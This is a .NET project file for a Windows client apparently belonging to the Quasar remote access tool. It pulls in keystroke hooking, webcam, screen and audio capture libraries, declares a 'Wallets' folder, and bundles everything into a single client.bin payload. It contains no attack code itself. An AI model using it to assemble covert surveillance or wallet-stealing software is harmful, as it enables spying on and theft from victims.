<Project Sdk="Microsoft.NET.Sdk.WindowsDesktop">
	<PropertyGroup>
		<TargetFramework>net472</TargetFramework>
		<OutputType>WinExe</OutputType>
		<AssemblyName>Client</AssemblyName>
		<UseWindowsForms>true</UseWindowsForms>
		<GenerateAssemblyInfo>false</GenerateAssemblyInfo>
		<Platforms>AnyCPU</Platforms>
	</PropertyGroup>
	<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
		<OutputPath>..\bin\Debug\</OutputPath>
		<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
		<DebugType>portable</DebugType>
		<DebugSymbols>true</DebugSymbols>
		<PlatformTarget>AnyCPU</PlatformTarget>
	</PropertyGroup>
	<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
		<DebugType>none</DebugType>
		<OutputPath>..\bin\Release\</OutputPath>
		<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
		<PlatformTarget>AnyCPU</PlatformTarget>
	</PropertyGroup>
	<PropertyGroup>
		<StartupObject>Quasar.Client.Program</StartupObject>
	</PropertyGroup>
	<PropertyGroup>
		<ApplicationManifest>app.manifest</ApplicationManifest>
	</PropertyGroup>
	<ItemGroup>
		<Reference Include="System.Management" />
		<Reference Include="System.Security" />
		<Reference Include="System.Web" />
	</ItemGroup>
	<ItemGroup>
		<EmbeddedResource Update="Properties\Resources.resx">
			<Generator>ResXFileCodeGenerator</Generator>
			<LastGenOutput>Resources.Designer.cs</LastGenOutput>
			<SubType>Designer</SubType>
		</EmbeddedResource>
		<Compile Update="Properties\Resources.Designer.cs">
			<AutoGen>True</AutoGen>
			<DependentUpon>Resources.resx</DependentUpon>
			<DesignTime>True</DesignTime>
		</Compile>
		<None Update="Properties\Settings.settings">
			<Generator>SettingsSingleFileGenerator</Generator>
			<LastGenOutput>Settings.Designer.cs</LastGenOutput>
		</None>
		<Compile Update="Properties\Settings.Designer.cs">
			<AutoGen>True</AutoGen>
			<DependentUpon>Settings.settings</DependentUpon>
			<DesignTimeSharedInput>True</DesignTimeSharedInput>
		</Compile>
	</ItemGroup>
	<ItemGroup>
		<ProjectReference Include="..\Quasar.Common\Quasar.Common.csproj" />
	</ItemGroup>
	<ItemGroup>
		<PackageReference Include="AForge.Video" Version="2.2.5" />
		<PackageReference Include="AForge.Video.DirectShow" Version="2.2.5" />
		<PackageReference Include="Costura.Fody" Version="6.0.0">
		  <PrivateAssets>all</PrivateAssets>
		  <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
		</PackageReference>
		<PackageReference Include="Fody" Version="6.9.2">
		  <PrivateAssets>all</PrivateAssets>
		  <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
		</PackageReference>
		<PackageReference Include="MouseKeyHook">
			<Version>5.7.1</Version>
		</PackageReference>
		<PackageReference Include="protobuf-net">
			<Version>2.4.9</Version>
		</PackageReference>
		<PackageReference Include="SharpDX" Version="4.2.0" />
		<PackageReference Include="SharpDX.Direct3D11" Version="4.2.0" />
		<PackageReference Include="SharpDX.DXGI" Version="4.2.0" />
		<PackageReference Include="System.IO.Compression" Version="4.3.0" />
	</ItemGroup>
	<ItemGroup>
		<Folder Include="FileManager\"/>
		<Folder Include="Kematian\Wallets\" />
	</ItemGroup>
	<ItemGroup>
	  <None Include="Naudio\NAudio.Asio\NAudio.Asio.csproj" />
	  <None Include="Naudio\NAudio.Core\NAudio.Core.csproj" />
	  <None Include="Naudio\NAudio.Midi\NAudio.Midi.csproj" />
	  <None Include="Naudio\NAudio.Wasapi\NAudio.Wasapi.csproj" />
	  <None Include="Naudio\NAudio.WinForms\NAudio.WinForms.csproj" />
	  <None Include="Naudio\NAudio.WinMM\NAudio.WinMM.csproj" />
	</ItemGroup>
	<Target Name="CopyWindows" AfterTargets="Build" Condition="'$(OS)' == 'Windows_NT'">
		<Exec Command="copy &quot;$(TargetPath)&quot; &quot;$(TargetDir)client.bin&quot; /Y" />
	</Target>

</Project>